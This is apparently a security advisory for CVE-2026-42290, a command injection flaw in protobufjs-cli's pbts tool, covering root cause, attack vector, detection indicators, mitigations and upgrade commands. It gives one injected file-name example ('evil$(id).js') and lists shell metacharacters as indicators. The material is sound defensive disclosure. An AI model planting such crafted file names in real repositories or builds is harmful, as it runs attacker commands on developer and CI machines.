CVE-2026-42290 Overview
CVE-2026-42290 is a command injection vulnerability [CWE-78] in protobufjs-cli, the command line add-on for protobuf.js. The pbts tool builds a shell command string from input file paths and executes it through child_process.exec to invoke JSDoc. File paths containing shell metacharacters are interpreted by the shell rather than passed to JSDoc as plain arguments. Attackers who can influence file paths processed by pbts can execute arbitrary commands in the context of the invoking user. The issue is fixed in versions 1.2.1 and 2.0.2.
Critical Impact
Untrusted file paths passed to pbts can trigger arbitrary shell command execution with confidentiality, integrity, and availability impact.
Affected Products
- protobufjs-cli versions prior to 1.2.1 (1.x branch)
- protobufjs-cli versions prior to 2.0.2 (2.x branch)
- Build pipelines and tooling that invoke pbts with externally influenced file paths
Discovery Timeline
- 2026-05-13 - CVE-2026-42290 published to the National Vulnerability Database (NVD)
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2026-42290
Vulnerability Analysis
The pbts utility generates TypeScript definitions from protobuf.js-annotated JavaScript (typically the output of pbjs) by delegating documentation extraction to JSDoc. To invoke JSDoc, pbts concatenates user-supplied input file paths into a single shell command string and passes that string to child_process.exec. Because exec runs the string through a shell (/bin/sh -c on POSIX systems, cmd.exe /c on Windows), any shell metacharacter present in a path is interpreted by the shell rather than passed through as data. Characters such as `, $(), ;, &, |, and > allow command substitution, chaining, or redirection. An attacker who controls or partially controls a file path argument can therefore execute arbitrary commands with the privileges of the user running pbts.
Root Cause
The root cause is unsafe construction of an operating system command. The CLI builds a command string from untrusted input and routes it through a shell interpreter instead of invoking the JSDoc executable directly with an argument array (for example through child_process.execFile or spawn without the shell option). Data and command syntax therefore share the same channel without escaping, a textbook instance of OS Command Injection [CWE-78].
Attack Vector
Exploitation requires local access and user interaction, consistent with the CVSS vector AV:L/AC:L/PR:N/UI:R: a person or an automated job has to run pbts over the attacker-influenced path. A typical scenario is a developer or CI job that runs pbts against a repository containing attacker-influenced filenames, an autogenerated path, or a directory glob that resolves to a crafted name. A file name cannot contain /, so the injected text must fit in a single path component; a name such as evil$(id).js is enough to make the shell perform the substitution during exec and run the embedded command. Because attackers can stage malicious filenames in dependencies, pull requests, or artifact archives, the practical attack surface includes any automated build that points pbts at externally sourced inputs (the annotated JavaScript that pbjs emits from .proto definitions, or globs over directories that contain it).
No verified public exploit code is available. See the GitHub Security Advisory GHSA-f84p-cvgm-xgjj for vendor analysis.
Detection Methods for CVE-2026-42290
Indicators of Compromise
- Unexpected child processes spawned by node or pbts invoking /bin/sh -c with concatenated file path arguments
- Outbound network connections from CI build agents shortly after pbts execution against untrusted sources
- Input file names passed to pbts (typically the pbjs-generated JavaScript) that contain shell metacharacters such as `, $(, ;, &, or |
Detection Strategies
- Inventory installed protobufjs-cli versions across developer workstations and CI runners and flag installations below 1.2.1 or 2.0.2
- Hunt process trees where node or pbts is the parent of sh -c followed by JSDoc invocation, and inspect the command line for non-alphanumeric characters in path positions
- Review source control history for filenames containing shell metacharacters introduced through pull requests or third-party archives
Monitoring Recommendations
- Enable process command line auditing on build hosts and forward events to centralized logging for retrospective analysis
- Alert on pbts or protobuf.js build steps that produce unexpected outbound network traffic or modify files outside the build workspace
- Track package manifest changes that pin protobufjs-cli to versions older than the patched releases
How to Mitigate CVE-2026-42290
Immediate Actions Required
- Upgrade protobufjs-cli to 1.2.1 for the 1.x branch or 2.0.2 for the 2.x branch across all developer and CI environments
- Audit build pipelines that invoke pbts against externally sourced input files and quarantine any inputs whose names contain shell metacharacters
- Rotate any secrets accessible to build agents that processed untrusted inputs while running a vulnerable pbts version
Patch Information
The maintainers fixed the issue in protobufjs-cli 1.2.1 and 2.0.2 by changing how pbts invokes JSDoc so that file paths are passed as separate arguments rather than concatenated into a shell command string. Details are published in the GitHub Security Advisory GHSA-f84p-cvgm-xgjj.
Workarounds
- Restrict pbts execution to trusted file paths under developer-controlled directories until patching is complete
- Validate input filenames against an allowlist of safe characters such as [A-Za-z0-9_./-] before passing them to pbts
- Run pbts inside a sandbox or container with no network egress and minimal filesystem privileges to contain potential command execution
# Upgrade commands
npm install --save-dev protobufjs-cli@^2.0.2
# Or for the 1.x branch:
npm install --save-dev protobufjs-cli@^1.2.1
# Verify the installed version, nested copies included
npm ls protobufjs-cli --all
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.